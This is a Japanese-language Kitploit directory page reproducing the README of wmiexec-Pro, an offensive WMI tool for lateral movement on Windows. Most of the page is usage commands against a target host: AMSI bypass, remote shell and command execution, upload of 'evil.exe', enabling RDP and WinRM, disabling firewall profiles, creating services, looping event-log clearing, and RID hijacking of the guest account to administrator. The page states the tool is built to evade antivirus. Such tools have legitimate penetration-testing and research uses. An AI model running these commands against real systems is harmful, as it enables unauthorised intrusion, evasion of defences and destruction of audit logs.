Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
wmiexec-Pro — New generation of wmiexec.py | Kitploit
ツール/GitHubGitHub/xiaolichan/wmiexec-pro
Privilege EscalationPersistence MechanismsLateral MovementInformation GatheringPost-ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubxiaolichan/wmiexec-pro

wmiexec-Pro

New generation of wmiexec.py

リポジトリを見る
1.3k1513ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

wmiexec-Pro

wmiexec.py の次世代版。

目次

  1. 情報
  2. スペシャルサンクス
  3. 特徴
  4. はじめに
    • インストール
  5. 使い方
  6. スクリーンショット
  7. 動作の仕組み
  8. 免責事項
  9. 参照

情報

wmiexec.py の次世代版です。より多くの新機能を備え、すべての操作はポート 135 のみで動作します(SMB 接続は不要)。横移動における AV 回避(Windows Defender、HuoRong、360)を目的としています。

(トップに戻る)

スペシャルサンクス

@422926799

(トップに戻る)

特徴

  • 主な機能: AV回避
  • 主な機能: win32_process は不要
  • 主な機能: ポート 135 のみで動作
  • 新モジュール: AMSIバイパス
  • 新モジュール: ファイル転送
  • 新モジュール: WMIクラスメソッドによるリモートRDP有効化
  • 新モジュール: Windowsファイアウォールの悪用
  • 新モジュール: イベントログのループクリーニング
  • 新モジュール: CMDを使わないリモートWinRM有効化
  • 新モジュール: サービス管理
  • 新モジュール: RIDハイジャック
  • 拡張: 新しい方法によるコマンド実行出力の取得
  • 拡張: VBSファイルの実行

(トップに戻る)

はじめに

インストール

必要なのは最新版の Impacket のみ

  1. impacket リポジトリをクローンします
    root@kitploit:~
    git clone https://github.com/fortra/impacket
    
  2. impacket をインストールします
    root@kitploit:~
    cd impacket && sudo pip3 install .
    
  3. 楽しんでください :)
    root@kitploit:~
    git clone https://github.com/XiaoliChan/wmiexec-Pro
    

(トップに戻る)

使い方

root@kitploit:~
python3 wmiexec-pro.py [[domain/]username[:password]@]<targetName or address> module -h

Basic enumeration:
   python3 wmiexec-pro.py administrator:[email protected] enum -run

Enable/disable amsi bypass:
   python3 wmiexec-pro.py administrator:[email protected] amsi -enable
   python3 wmiexec-pro.py administrator:[email protected] amsi -disable

Execute command:
   python3 wmiexec-pro.py administrator:[email protected] exec-command -shell (Launch a semi-interactive shell)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" (Default is with output mode)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -silent (Silent mode)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -silent -old (Slient mode in old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -old (With output in old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -save (With output and save output to file)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -old -save
   python3 wmiexec-pro.py administrator:[email protected] exec-command -clear (Remove temporary class for command result storage)
   
Filetransfer:
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -upload -src-file "./evil.exe" -dest-file "C:\windows\temp\evil.exe" (Upload file over 512KB)
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -download -src-file "C:\windows\temp\evil.exe" -dest-file "/tmp/evil.exe" (Download file over 512KB)
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -clear (Remove temporary class for file transfer)
   
RDP:
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable (Auto configure firewall)
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable -old (For old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable-ram (Enable Restricted Admin Mode for PTH, not support old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable -old (For old version OS, such as server 2003, not support old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable-ram (Disable Restricted Admin Mode)

WinRM (Only support win7+):
   python3 wmiexec-pro.py administrator:[email protected] winrm -enable
   python3 wmiexec-pro.py administrator:[email protected] winrm -disable

Firewall (Only support win8+):
   python3 wmiexec-pro.py administrator:[email protected] firewall -search-port 445
   python3 wmiexec-pro.py administrator:[email protected] firewall -dump (Dump all firewall rules)
   python3 wmiexec-pro.py administrator:[email protected] firewall -rule-id (ID from search port) -action [enable/disable/remove] (enable, disable, remove specify rule)
   python3 wmiexec-pro.py administrator:[email protected] firewall -firewall-profile enable (Enable all firewall profiles)
   python3 wmiexec-pro.py administrator:[email protected] firewall -firewall-profile disable (Disable all firewall profiles)
   
Services:
   python3 wmiexec-pro.py administrator:[email protected] service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe'
   python3 wmiexec-pro.py administrator:[email protected] service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe' -class "Win32_TerminalService" (Create service via alternative class)
   python3 wmiexec-pro.py administrator:[email protected] service -action start -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action stop -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action disable -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action auto-start -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action manual-start -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action getinfo -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action delete -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -dump all-services.json

Eventlog:
   python3 wmiexec-pro.py administrator:[email protected] eventlog -risk-i-know (Looping cleaning eventlog)
   python3 wmiexec-pro.py administrator:[email protected] eventlog -retrive object-ID (Stop looping cleaning eventlog)

RID Hijack:
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action grant (Grant access permissions for SAM/SAM subkey in registry)
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action grant-old (For old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action activate (Activate user)
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action deactivate (Deactivate user)
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action hijack -user 501 -hijack-rid 500 (Hijack guest user rid 501 to administrator rid 500)
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -blank-pass-login enable (Enable blank password login)
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -blank-pass-login disable
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 500 -action backup (This will save user profile data as json file)
   python3 wmiexec-pro.py [email protected] -no-pass rid-hijack -user 500 -remove (Use guest user remove administrator user profile after rid hijacked)
   python3 wmiexec-pro.py [email protected] -no-pass rid-hijack -restore "backup.json" (Restore user profile for target user)
   

(トップに戻る)

スクリーンショット

  • ヘルプ

  • exec-command

  • filetransfer

    • ファイルのアップロード

    • ファイルのダウンロード

(トップに戻る)

動作の仕組み

  • AMSI モジュール:

    • Black Hat Asia 2018 の Tal-Liberman の手法。
  • exec-command モジュール:

    • 以前のプロジェクト wmiexec-RegOut の拡張版。レジストリではなく WMI クラスから出力を取得します。
  • filetransfer モジュール:

    • アップロード: ソースファイルを base64 文字列として WriteFile.vbs というドロッパーにエンコードし、ActiveScriptEventConsumer オブジェクトの新しいインスタンスを作成してドロッパーを実行します。
    • ダウンロード: データを格納するクラスをリモートに作成し、エンコーダー LocalFileIntoClass.vbs を実行してファイルをエンコードし、作成したばかりのクラスにデータを格納します。
  • rdp モジュール:

    • 有効化/無効化: RDP サービス: TerminalServices オブジェクトを直接制御します。
    • 有効化/無効化: 制限付き管理者モード: StdRegProv クラス経由でレジストリキー DisableRestrictedAdmin を制御します。
  • winrm モジュール:

    • 有効化/無効化: サービスモジュールを呼び出します。
    • ファイアウォールルール: firewall.py モジュールを使用して winrm のファイアウォールを設定します。
  • firewall モジュール:

    • MSFT_NetProtocolPortFilter、MSFT_NetFirewallRule、 クラスを悪用します。

(トップに戻る)

免責事項

このオープンソースイニシアチブの精神は、セキュリティ研究者とコミュニティが、ネットワークプロトコルとスタックの実装に関する研究および教育活動を迅速に進めることを支援することです。

このリポジトリ内の情報は研究および教育目的のためのものであり、本番環境や商用製品の一部として使用することを意図したものではありません。

このコードまたはその一部を独自の目的で使用したい場合は、適切なセキュリティ開発ライフサイクルとセキュアコーディングの実践を適用し、必要に応じてそれぞれの侵害指標(IOC)を生成・追跡することをお勧めします。

(トップに戻る)

参照

  • GhostPack/SharpWMI
  • impacket
  • WMIHACKER
  • Microsoft WMI ドキュメント
  • Microsoft VBScript ドキュメント

(トップに戻る)

ツールをダウンロード
MSFT_NetFirewallProfile
  • service モジュール:

    • Win32_Service クラスを悪用します。
  • eventlog モジュール:

    • event と consumer を削除せずに VBS スクリプトファイル ClearEventlog.vbs を実行します。
  • execute-vbs モジュール:

    • wmipersist.py から採用。
  • classMethodEx メソッド:

    • クラス作成: シンプルなクラスを作成するために VBS スクリプト CreateClass.vbs を実行します。(なぜか? impacket で PutClass メソッドの使い方がわからないためです。)
    • クラス削除: DeleteClass メソッドを呼び出してクラスを削除します。